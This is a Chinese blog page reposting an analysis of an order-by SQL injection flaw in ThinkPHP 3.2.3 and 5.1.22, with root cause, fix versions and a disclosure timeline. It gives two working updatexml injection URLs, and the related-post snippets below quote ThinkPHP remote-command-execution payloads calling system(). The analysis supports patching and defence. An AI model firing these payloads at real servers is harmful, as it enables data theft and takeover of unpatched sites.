php5.3.x 漏洞,ThinkPHP 3.X/5.X order by注入漏洞

最新推荐文章于 2023-07-30 22:03:12 发布
最新推荐文章于 2023-07-30 22:03:12 发布
阅读量647 收藏
点赞数

ThinkPHP SQL注入 漏洞分析 安全修复 框架漏洞
关键词由CSDN通过智能技术生成

ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,创立于2006年初,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多的原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进,已经成长为国内最领先和最具影响力的WEB应用开发框架,众多的典型案例确保可以稳定用于商业以及门户级的开发。

### 漏洞原理

ThinkPHP在处理order by排序时,当排序参数可控且为关联数组(key-value)时,由于框架未对数组中key值作安全过滤处理,攻击者可利用key构造SQL语句进行注入,该漏洞影响ThinkPHP 3.2.3、5.1.22及以下版本。

ThinkPHP3.2.3漏洞代码(/Library/Think/Db/Driver.class.php):

![](https://images.seebug.org/1535615180202)

ThinkPHP 5.1.22漏洞代码(framework/library/think/db/Query.php):

![](https://images.seebug.org/1535615193575)

从上面漏洞代码可以看出,当$field参数为关联数组(key-value)时,key值拼接到返回值中,SQL语句最终绕过了框架安全过滤得以执行。

### 漏洞利用

ThinkPHP 3.2.3

漏洞demo

![](https://images.seebug.org/1535615209352)

访问如下URL即可进行漏洞利用:

```

http://127.0.0.1/ThinkPHP/?order[updatexml(1,concat(0x3a,user()),1)]=1

```

![](https://images.seebug.org/1535615232437)

ThinkPHP 5.1.22

漏洞demo

![](https://images.seebug.org/1535615257088)

```

http://127.0.0.1/tp5/public/index/index/test/index?order[id`|updatexml(1,concat(0x3a,user()),1)%23]=1

```

访问如下URL即可进行漏洞利用。

![](https://images.seebug.org/1535615288155)

动态调试可以发现,经框架处理后返回的SQL语句内容如下,继而带入SQL查询语句导致注入漏洞的产生。

![](https://images.seebug.org/1535615310683)

### 漏洞修复

5.X版本升级到最新5.1.23版本

3.X版本升级到最新版本

### 漏洞时间线

* 2018.8.10 提交github issues

* 2018.8.16 官方确认漏洞,在下个版本改进

* 2018.8.23 发布的新版本5.1.23中修复了该漏洞

* 2018.8.28 3.2.3版本发布补丁修复该漏洞

loading-bars.svg

唐编辑
关注
Thinkphp漏洞
weixin_43873557的博客
02-06 1029
Thinkphp介绍 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,支持 windows/Unix/Linux等服务器环境。 ➢ Thinkphp应用 很多cms就是基于thinkphp二次开发的,所以thinkphp出问题的话,会影响很多基于thinkphp开发的网站。 ➢历史漏洞 ThinkPHP3.2.3_缓存函数设计缺陷可导致Getshell ThinkPHP5_SQL注入漏洞&&敏感信息泄露 ThinkPHP3.2.3_最新版update注入漏洞 Thin
ThinkPHP5x 远程代码执行漏洞(CNVD-2018-24942)复现
yzl_007的博客
08-04 1244
ThinkPHP5x 远程代码执行漏洞(CNVD-2018-24942)复现 影响范围 ThinkPHP 5.0.全版本 5.0.13~5.0.19的,这些版本默认情况下config中的app_debug配置项为false,需开启才能存在此漏洞漏洞复现 远程代码执行 直接get请求即可 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd pw
ThinkPHP 5.x远程命令执行漏洞复现
WY92139010的博客
09-23 701
ThinkPHP 5.x远程命令执行漏洞复现 一、漏洞描述 2018年12月10日,ThinkPHP官方发布了安全更新,其中修复了ThinkPHP5框架的一个高危漏洞: https://blog.thinkphp.cn/869075 漏洞的原因是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行,受影响的版本包括5.0和5.1。 ...
php 5.3.3 漏洞,PHP 5.3.10多个拒绝服务漏洞
weixin_39716044的博客
03-11 445
发布日期:2012-06-03更新日期:2012-06-05受影响系统:PHP PHP 5.3.10描述:--------------------------------------------------------------------------------BUGTRAQ ID: 53763PHP是一种HTML内嵌式的语言,PHP与微软的ASP颇有几分相似,都是一种在服务器端执行的嵌入...
php 5.3.3 漏洞,PHP 5.3.7版本更新 修复安全漏洞
weixin_42363022的博客
03-11 866
【IT168 专稿】据PHP官方网站消息,PHP开发人员于8月18日正式发布最新版PHP 5.3.7版本,这是对PHP脚本语言稳定分支的安全和维护更新。此次更新对90多个bug进行了修复,并对PHP自带的数据库软件Sqlite3(更新至版本3.7.7.1)和表达式函数库PCRE(更新至版本8.12)进行更新。在前一版本中,大量bug造成了很多崩溃缺陷,例如在使用tack_errors、调用未知函数...
PHP 最新精品面试题
weixin_43681591的博客
01-13 2928
1、酒店预订怎么实现?怎么设计表   你好,我大概的说下我们的业务流程,我们的业务流程是:用户在网站浏览酒店信息,可以根据地区检索出该地区的酒店信息。列表展示酒店的信息由:酒店的名称,酒店图片,酒店位置,评论人数,评论分数以及最低入住价格。用户选中要入住的酒店进入酒店详情页面,查看酒店的介绍以及酒店的房型列表,用户根据他要入住的时间和离店的时间,检索出这个时间段内的所有可选房型(房间数量-当天的订...
内网安全-隧道穿透漫游
m0_67105288的博客
02-23 656
隧道穿透与端口转发 什么是隧道? 在渗透测试中,进入内网后,我们要判断流量是否能够出的去、进的来。 在实际的网络情况下,流量会经过很多的边界设备,在一般的企业内网中,可能会存在 IDP、IPS、防火墙等设备,如果异常的话,就会直接将通信阻断;这里我们说的隧道,就是绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方通信。当被封装的数据包达到了另外的地址的时候,解包还原,并将还原后的数据包发送到相应的服务器上。 常见的隧道包括三个大类:网络层、应用
php面试题汇总(必会)
pz_winner的博客
11-08 3164
1、酒店预订怎么实现?怎么设计表   你好,我大概的说下我们的业务流程,我们的业务流程是:用户在网站浏览酒店信息,可以根据地区检索出该地区的酒店信息。列表展示酒店的信息由:酒店的名称,酒店图片,酒店位置,评论人数,评论分数以及最低入住价格。用户选中要入住的酒店进入酒店详情页面,查看酒店的介绍以及酒店的房型列表,用户根据他要入住的时间和离店的时间,检索出这个时间段内的所有可选房型(房间数量-当天
php面试宝典
qq_35396905的博客
08-29 835
Include和require的区别 区别一 Include引入文件的时候,如果碰到错误,会给出提示,并继续运行下边的代码。 Require引入文件的时候,如果碰到错误,会给出提示,并停止运行下边的代码。 区别二 用法上却有一些不同,include是有条件包含函数,而require则是无条件包含函数 Include 是比较松一点的‘包含’,如:文件不存在也不会出现什么问题,程序还可以往...
笔记,后期整理
weixin_30278237的博客
08-06 8279
VM 虚拟各种系统的工具 安装目录 不要放在C盘 需要下载的镜像Windows NT win7 xp server08R2 server12类Nnix centos 6/7/8 ubuntu 14/16/18 kali安装 win7 1g=1024M1M=1024KB1KB=1024bit1bit 是一个字节 一个字节就是8位由0或者1组成(二进制) 10 进制0-9组成的数字...
#Thinkphp5.x漏洞
bmxch的博客
01-20 351
#Thinkphp5.x漏洞 系统类型:linux 漏洞类型:Thinkphp5.x漏洞 漏洞URL:http://192.168.1.246/public/ 漏洞详情: 已知真实IP是192.168.1.246,扫后台 然后扫这两个网页是否存在漏洞 上传一句话木马到靶机 代码: http://192.168.1.246/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=syste
Thinkphp5.0.x 文件包含漏洞
最新发布
weixin_61785633的博客
07-30 681
这个漏洞我复现的不是很完善,按网上的教程,传入图片码是可以被解析为php文件,从而实现攻击,但是我尝试了几次都不成功,目前还不知道是为什么。
thinkphp5.X漏洞利用EXP
Websec
05-17 2201
thinkphp5最出名的就是rce,rce有两个大版本的分别 ThinkPHP 5.0-5.0.24 ThinkPHP 5.1.0-5.1.30 因为漏洞触发点和版本的不同,导致payload分为多种,其中一些payload需要取决于debug选项比如直接访问路由触发的 5.1.x : ?s=index/thinkRequest/input&filter[]=system&data=pwd ?s=index/thinkviewdriverPhp/display&conte
PHP 5.3.1版本之前的拒绝服务攻击漏洞(附测试代码)
weixin_30726161的博客
08-09 116
# # PHP MultiPart Form-Data Denial of Service proof of concept, 23-10-2009 # Bogdan Calin (bogdan@acunetix.com) # import httplib, urllib, sys, string, threading from string import replace ...
thinkPHP3.x日志泄露漏洞复现
千寻的博客
12-18 3190
漏洞名称 thinkPHP3.x日志泄露 漏洞描述 ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且debug很多网站都没有关 ThinkPHP默认安装后,也会在Runtime目录下生成日志 日志很容易被猜解到,而且日志里面有执行SQL语句的记录 影响版本 thinkPHP3.2 thinkPHP3. 漏洞分析 THINKPHP3.2 结构:Application\Runtime\Logs\Home\16_09_09.log THINKPHP3.1结构:Runti
php5漏洞汇总,ThinkPHP 5.x RCE 漏洞分析与利用总结
weixin_34931142的博客
03-19 1266
一、ThinkPHP 5.0.23 rce漏洞复现与总结漏洞复现thinkphp 5.0.23 rcethinkphp 5.0.23 rce源码下载:github:https://github.com/top-think/framework/tree/v5.0.23影响版本ThinkPHP 5.0系列 < 5.0.23ThinkPHP 5.1系列 < 5.1.31安全版本ThinkPH...
php5.3.27漏洞,Thinkphp3.x/5.x系列漏洞总结学习
weixin_42099176的博客
03-11 612
ThinkPHP 漏洞列表一、3.x使用方法bashcd /var/www/tp3ThinkPHP3.2.3_缓存函数设计缺陷可导致Getshell标题ThinkPHP5.0.10-3.2.3缓存函数设计缺陷可导致Getshell时间2017-08-09版本<= 3.2.3ThinkPHP3.2.3_最新版update注入漏洞标题Thinkphp3.2.3最新版update注入漏洞Think...
ThinkPHP5.x rec 漏洞分析与复现
MercyLin的博客
09-27 7507
https://help.aliyun.com/noticelist/articleid/1000081331.html?spm=5176.2020520001.1004.7.2e874bd363uLuf 先贴个漏洞预警,这里做一些内容摘要: 漏洞描述 由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接GetWebShell。...
thinkphp5 漏洞原理分析合集
m0_46689007的博客
11-30 7343
跟进Request.php中method(),Config::get(‘var_method’)提权var_method中的值,var_method的又为_method,这个_method可控,我们传入’__construct’,到$this->{$this->method}($_POST);因为执行的是get方法,跟进get()方法,此方法为读取配置文件,所以我们构造的参数进入get()中就会控制读取内容,后面返回self::$config[$range][$name[0]][$name[1]]。
ThinkPHP 3.x中display与show方法详解与实例
ThinkPHP 3.x版本中,display方法和show方法是视图层的重要组成部分,用于处理模板文件的加载、数据绑定和最终的输出。这两者都是实现前后端分离和代码复用的关键工具。 1. **模板文件定义**: - ThinkPHP 3.x...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值